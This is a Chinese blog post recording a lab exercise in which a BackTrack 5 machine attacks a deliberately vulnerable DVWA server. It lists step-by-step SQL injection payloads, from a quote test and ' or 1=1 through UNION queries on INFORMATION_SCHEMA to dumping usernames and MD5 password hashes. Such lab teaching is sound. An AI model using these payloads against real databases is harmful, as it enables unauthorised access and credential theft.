Bt5的sql注入实例

(..•˘_˘•..) 版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创! (..•˘_˘•..)某些网站的小编真的是眼瞎! 转载注明出处!求求你了!

实验之前请先阅读这篇文章:https://www.idaobin.com/explain

任务描述:
了解sql注入方法P170

任务环境说明:

攻击机:BT5
靶机:WEB服务器
攻击机安装服务/工具1:firefox
攻击机安装服务/工具2:
攻击机安装服务/工具3:
攻击机安装服务/工具4:

实现步骤:

1.    修改安全防护级别,改成低级,并保存配置
Firefox浏览器打开dvwa后台登录地址(http://10.10.10.129/dvwa/login.php)
管理员账号和密码:admin/admin

dvwa管理员登录

登录后台之后,对网站安全等级进行修改

dvwa后台设置

dvwa后台设置

dvwa后台设置

2.    实现图4-11的效果;
SQL注入,查看是否存在注入漏洞

输入'值

输入不正确字符“’”提交之后,出现以下提示信息则说明存在注入漏洞

输入'值之后

通过特殊编制的SQL语句进行查询,获取网站后台的所有用户及密码

输入特制sql语句

输入特殊编制的SQL语句’ or 1=1 — ‘提交之后,获取信息如下:

输入sql语句后

3.    实现图4-12的效果;

通过特殊编制的SQL语句查询更多信息

输入特制sql语句

输入特殊字符串’ union select 1,2 — ‘提交之后,获取结果如下:

输入sql语句后

注意:提示说明该网站的数据表存在两列

4.    实现图4-13的效果;
输入SQL语句查询数据库更多信息’ union select 1, table_name from INFORMATION_SCHEMA.tables — ‘

输入特制sql语句

检索INFORMATION_SCHEMA的结果如下:

输入sql语句后

注意:判断guestbook和users为网站所使用的数据表

5.    实现图4-14的效果;
输入SQL语句’ UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = ‘users’  — ‘  列出users表的内容

输入特制sql语句

列出users表的所有内容以后,查询到users表存在password列(密码内容)

输入sql语句后

输入SQL语句’ UNION SELECT NULL, password from users — ‘列出password列的密码内容(密码为MD5值,需要转换一下)

输入sql语句后

6.    实现图4-15的效果;
使用concat函数将所有信息列出来
输入SQL语句’ UNION SELECT password, concat (first_name, ‘ ‘ , last_name, ‘ ‘ , user) from users —

输入特制sql语句

结果如下:

输入sql语句后

原文链接:https://www.idaobin.com/archives/699.html

既然都复制粘贴转载了,就不能打赏一点…ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信
图片加载中图片加载中

发表评论

电子邮件地址不会被公开。 必填项已用*标注

× 8 = 16